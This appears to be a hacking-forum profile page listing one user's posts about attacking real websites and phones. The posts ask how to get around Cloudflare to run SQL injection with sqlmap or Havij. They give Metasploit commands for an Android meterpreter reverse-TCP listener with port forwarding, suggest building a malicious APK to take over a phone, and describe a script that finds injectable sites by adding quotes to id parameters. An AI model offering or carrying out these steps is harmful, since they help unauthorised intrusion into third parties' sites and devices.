Jump to content


Active Members
  • Content Count

  • Joined

  • Last visited

About 0o0michael0o0

  • Rank

Recent Profile Visitors

230 profile views
  1. i had that problem before . i bypassed the cloudflare and i get the true ip adress for the target now what to do next to inject the target site with sql for example ?!!
  2. use multi/handler set PAYLOAD android/meterpreter/reverse_tcp set LHOST xx.xx.xx.xx set LPORT 24000 exploit -j make sure that u have the port 24000 open on your router and link it to ur internal ip address type in terminal nc -lvp 24000 and check if ur port is open throw this site http://www.canyouseeme.org/ if u get a connection from this site that means that all is good with u that shall work fine and if u want to use a dynamic dns https://community.rapid7.com/thread/4676
  3. use burpsuit and check the post data , who knows may be u can inject the post data
  4. thnx digip , actually the site is very well protected and i tried to enumrate the dns with more than methoud but i got a question , if i get the real ip of the server , how can i make the sqlmap or havij for example use the real ip ?? i know that if i get the user of the site , i can do it like that but what if i did`nt get the user of the site ? how can i inject the site after getting the real ip ? thnx in advance
  5. there is a payload in metasploit make apk and hack the android android/meterpreter/reverse_tcp
  6. yeah sure i just thought it might be useful to share with you that script couse it works fine with me .
  7. yeah sure i know but i did`nt hack the server , i`m just trying to explain my point :) i will try to refine it , and plz u can edit my comments with the site and delete it for me :) thnx
  8. i know its not perfect , the script is simply searching for sql error for ex ruby mick.rb id u will get that result
  9. nooo ok try that i know that this server is vurnable to sql and u will understand what i mean :) ruby mick.rb id
  10. the script is simply go to bing.com and write in the search ip: so it extract the server sites by that methoud then it looks for sql error for example .php?id=1 ' it puts the ' for all the id found in the server and if it found any error will tell u that the site is vurnabel :)
  11. i`m asking couse i had that problem before and i wonder is there a method to make the sql injection while the cloudflare is on
  12. i wonder is there any method to make sql injection while cloudflare firewall protecting the server !! ? how to bypass it ? thnx in advance.
  • Create New...